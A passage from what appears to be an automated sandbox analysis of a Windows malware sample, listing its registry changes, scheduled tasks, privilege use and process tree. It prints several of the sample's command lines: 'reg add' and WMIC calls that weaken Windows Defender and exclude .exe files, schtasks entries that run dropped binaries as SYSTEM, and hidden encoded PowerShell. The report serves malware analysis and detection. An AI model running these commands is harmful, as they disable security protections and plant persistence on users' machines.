rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f01a2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 glADGjJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3B5B5FEF-0A76-4277-BDF3-1FF13DBB5F18}\WpadNetworkName = "Network 3" glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3B5B5FEF-0A76-4277-BDF3-1FF13DBB5F18}\da-7e-48-cd-dd-56 glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs glADGjJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad glADGjJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3B5B5FEF-0A76-4277-BDF3-1FF13DBB5F18}\WpadDecision = "0" glADGjJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-7e-48-cd-dd-56\WpadDecision = "0" glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust glADGjJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f01a2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\da-7e-48-cd-dd-56\WpadDecisionTime = 401a3a5bf510db01 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ NcfwarB.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings glADGjJ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 glADGjJ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{3B5B5FEF-0A76-4277-BDF3-1FF13DBB5F18}\WpadDecisionReason = "1" glADGjJ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates glADGjJ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_Classes\Local Settings rundll32.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2288 schtasks.exe 836 schtasks.exe 1916 schtasks.exe 1316 schtasks.exe 2592 schtasks.exe 1964 schtasks.exe 2028 schtasks.exe 2620 schtasks.exe 2960 schtasks.exe 2936 schtasks.exe 2348 schtasks.exe 2400 schtasks.exe 3068 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 59 IoCs
pid Process 2940 powershell.exe 2940 powershell.exe 2940 powershell.exe 1812 powershell.exe 760 stories.tmp 760 stories.tmp 2912 powershell.exe 2912 powershell.exe 2912 powershell.exe 2228 powershell.EXE 2228 powershell.EXE 2228 powershell.EXE 1584 powershell.EXE 1584 powershell.EXE 1584 powershell.EXE 2592 powershell.exe 1280 powershell.EXE 1280 powershell.EXE 1280 powershell.EXE 536 powershell.exe 536 powershell.exe 536 powershell.exe 2624 powershell.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 668 powershell.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe 2336 glADGjJ.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1400 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1064 file.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeIncreaseQuotaPrivilege 908 WMIC.exe Token: SeSecurityPrivilege 908 WMIC.exe Token: SeTakeOwnershipPrivilege 908 WMIC.exe Token: SeLoadDriverPrivilege 908 WMIC.exe Token: SeSystemProfilePrivilege 908 WMIC.exe Token: SeSystemtimePrivilege 908 WMIC.exe Token: SeProfSingleProcessPrivilege 908 WMIC.exe Token: SeIncBasePriorityPrivilege 908 WMIC.exe Token: SeCreatePagefilePrivilege 908 WMIC.exe Token: SeBackupPrivilege 908 WMIC.exe Token: SeRestorePrivilege 908 WMIC.exe Token: SeShutdownPrivilege 908 WMIC.exe Token: SeDebugPrivilege 908 WMIC.exe Token: SeSystemEnvironmentPrivilege 908 WMIC.exe Token: SeRemoteShutdownPrivilege 908 WMIC.exe Token: SeUndockPrivilege 908 WMIC.exe Token: SeManageVolumePrivilege 908 WMIC.exe Token: 33 908 WMIC.exe Token: 34 908 WMIC.exe Token: 35 908 WMIC.exe Token: SeDebugPrivilege 2912 powershell.exe Token: SeDebugPrivilege 2228 powershell.EXE Token: SeDebugPrivilege 1584 powershell.EXE Token: SeDebugPrivilege 2592 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2940 WMIC.exe Token: SeIncreaseQuotaPrivilege 2940 WMIC.exe Token: SeSecurityPrivilege 2940 WMIC.exe Token: SeTakeOwnershipPrivilege 2940 WMIC.exe Token: SeLoadDriverPrivilege 2940 WMIC.exe Token: SeSystemtimePrivilege 2940 WMIC.exe Token: SeBackupPrivilege 2940 WMIC.exe Token: SeRestorePrivilege 2940 WMIC.exe Token: SeShutdownPrivilege 2940 WMIC.exe Token: SeSystemEnvironmentPrivilege 2940 WMIC.exe Token: SeUndockPrivilege 2940 WMIC.exe Token: SeManageVolumePrivilege 2940 WMIC.exe Token: SeDebugPrivilege 1280 powershell.EXE Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2088 WMIC.exe Token: SeIncreaseQuotaPrivilege 2088 WMIC.exe Token: SeSecurityPrivilege 2088 WMIC.exe Token: SeTakeOwnershipPrivilege 2088 WMIC.exe Token: SeLoadDriverPrivilege 2088 WMIC.exe Token: SeSystemtimePrivilege 2088 WMIC.exe Token: SeBackupPrivilege 2088 WMIC.exe Token: SeRestorePrivilege 2088 WMIC.exe Token: SeShutdownPrivilege 2088 WMIC.exe Token: SeSystemEnvironmentPrivilege 2088 WMIC.exe Token: SeUndockPrivilege 2088 WMIC.exe Token: SeManageVolumePrivilege 2088 WMIC.exe Token: SeDebugPrivilege 668 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2572 WMIC.exe Token: SeIncreaseQuotaPrivilege 2572 WMIC.exe Token: SeSecurityPrivilege 2572 WMIC.exe Token: SeTakeOwnershipPrivilege 2572 WMIC.exe Token: SeLoadDriverPrivilege 2572 WMIC.exe Token: SeSystemtimePrivilege 2572 WMIC.exe Token: SeBackupPrivilege 2572 WMIC.exe Token: SeRestorePrivilege 2572 WMIC.exe Token: SeShutdownPrivilege 2572 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 760 stories.tmp -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1400 AcroRd32.exe 1400 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1064 wrote to memory of 1844 1064 file.exe 30 PID 1064 wrote to memory of 1844 1064 file.exe 30 PID 1064 wrote to memory of 1844 1064 file.exe 30 PID 1844 wrote to memory of 1400 1844 rundll32.exe 31 PID 1844 wrote to memory of 1400 1844 rundll32.exe 31 PID 1844 wrote to memory of 1400 1844 rundll32.exe 31 PID 1844 wrote to memory of 1400 1844 rundll32.exe 31 PID 1064 wrote to memory of 2716 1064 file.exe 32 PID 1064 wrote to memory of 2716 1064 file.exe 32 PID 1064 wrote to memory of 2716 1064 file.exe 32 PID 1064 wrote to memory of 2716 1064 file.exe 32 PID 1064 wrote to memory of 2716 1064 file.exe 32 PID 1064 wrote to memory of 2716 1064 file.exe 32 PID 1064 wrote to memory of 2716 1064 file.exe 32 PID 2716 wrote to memory of 2964 2716 setup.exe 33 PID 2716 wrote to memory of 2964 2716 setup.exe 33 PID 2716 wrote to memory of 2964 2716 setup.exe 33 PID 2716 wrote to memory of 2964 2716 setup.exe 33 PID 2716 wrote to memory of 2964 2716 setup.exe 33 PID 2716 wrote to memory of 2964 2716 setup.exe 33 PID 2716 wrote to memory of 2964 2716 setup.exe 33 PID 2964 wrote to memory of 2704 2964 Install.exe 34 PID 2964 wrote to memory of 2704 2964 Install.exe 34 PID 2964 wrote to memory of 2704 2964 Install.exe 34 PID 2964 wrote to memory of 2704 2964 Install.exe 34 PID 2964 wrote to memory of 2704 2964 Install.exe 34 PID 2964 wrote to memory of 2704 2964 Install.exe 34 PID 2964 wrote to memory of 2704 2964 Install.exe 34 PID 2704 wrote to memory of 2404 2704 Install.exe 35 PID 2704 wrote to memory of 2404 2704 Install.exe 35 PID 2704 wrote to memory of 2404 2704 Install.exe 35 PID 2704 wrote to memory of 2404 2704 Install.exe 35 PID 2704 wrote to memory of 2404 2704 Install.exe 35 PID 2704 wrote to memory of 2404 2704 Install.exe 35 PID 2704 wrote to memory of 2404 2704 Install.exe 35 PID 2404 wrote to memory of 2164 2404 cmd.exe 37 PID 2404 wrote to memory of 2164 2404 cmd.exe 37 PID 2404 wrote to memory of 2164 2404 cmd.exe 37 PID 2404 wrote to memory of 2164 2404 cmd.exe 37 PID 2404 wrote to memory of 2164 2404 cmd.exe 37 PID 2404 wrote to memory of 2164 2404 cmd.exe 37 PID 2404 wrote to memory of 2164 2404 cmd.exe 37 PID 2164 wrote to memory of 1524 2164 forfiles.exe 38 PID 2164 wrote to memory of 1524 2164 forfiles.exe 38 PID 2164 wrote to memory of 1524 2164 forfiles.exe 38 PID 2164 wrote to memory of 1524 2164 forfiles.exe 38 PID 2164 wrote to memory of 1524 2164 forfiles.exe 38 PID 2164 wrote to memory of 1524 2164 forfiles.exe 38 PID 2164 wrote to memory of 1524 2164 forfiles.exe 38 PID 1524 wrote to memory of 2880 1524 cmd.exe 39 PID 1524 wrote to memory of 2880 1524 cmd.exe 39 PID 1524 wrote to memory of 2880 1524 cmd.exe 39 PID 1524 wrote to memory of 2880 1524 cmd.exe 39 PID 1524 wrote to memory of 2880 1524 cmd.exe 39 PID 1524 wrote to memory of 2880 1524 cmd.exe 39 PID 1524 wrote to memory of 2880 1524 cmd.exe 39 PID 2404 wrote to memory of 1832 2404 cmd.exe 40 PID 2404 wrote to memory of 1832 2404 cmd.exe 40 PID 2404 wrote to memory of 1832 2404 cmd.exe 40 PID 2404 wrote to memory of 1832 2404 cmd.exe 40 PID 2404 wrote to memory of 1832 2404 cmd.exe 40 PID 2404 wrote to memory of 1832 2404 cmd.exe 40 PID 2404 wrote to memory of 1832 2404 cmd.exe 40 PID 1832 wrote to memory of 2908 1832 forfiles.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Documents\dl2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\dl"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1400
-
-
-
C:\Users\Admin\Documents\setup.exe"C:\Users\Admin\Documents\setup.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Users\Admin\AppData\Local\Temp\7zSBF97.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\7zSC37E.tmp\Install.exe.\Install.exe /fKkeRdidQeQB "385121" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:2880
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2908 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2768 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:1640 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵
- Indirect Command Execution
PID:2884 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
- System Location Discovery: System Language Discovery
PID:2576 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
- Indirect Command Execution
PID:2864 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:2916
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:680
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
- Indirect Command Execution
PID:1268 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- System Location Discovery: System Language Discovery
PID:876 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bHuqaEPbhrVtHIaGbF" /SC once /ST 15:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh\RPUgVTHHmvZBwzx\NcfwarB.exe\" wW /xZhedidn 385121 /S" /V1 /F5⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 5685⤵
- Loads dropped DLL
- Program crash
PID:2508
-
-
-
-
-
C:\Users\Admin\Documents\Channel2.exe"C:\Users\Admin\Documents\Channel2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1604
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2400
-
-
-
C:\Users\Admin\Documents\stories.exe"C:\Users\Admin\Documents\stories.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\is-0I1VV.tmp\stories.tmp"C:\Users\Admin\AppData\Local\Temp\is-0I1VV.tmp\stories.tmp" /SL5="$901F8,3004919,56832,C:\Users\Admin\Documents\stories.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:760 -
C:\Users\Admin\AppData\Local\Gerda Play3 SE\gerdaplay3se32.exe"C:\Users\Admin\AppData\Local\Gerda Play3 SE\gerdaplay3se32.exe" -i4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:776
-
-
-
-
C:\Users\Admin\Documents\CheckTool.exe"C:\Users\Admin\Documents\CheckTool.exe"2⤵
- Executes dropped EXE
PID:2040
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A7CE8934-DB13-441B-A758-EC224B6FCA4D} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]1⤵PID:2776
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:896
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:872
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:720
-
-
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2092
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {79485543-9BF2-435B-AF9F-7B8B677D6A81} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh\RPUgVTHHmvZBwzx\NcfwarB.exeC:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh\RPUgVTHHmvZBwzx\NcfwarB.exe wW /xZhedidn 385121 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2636 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2620
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2924 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2652
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:836
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:484 -
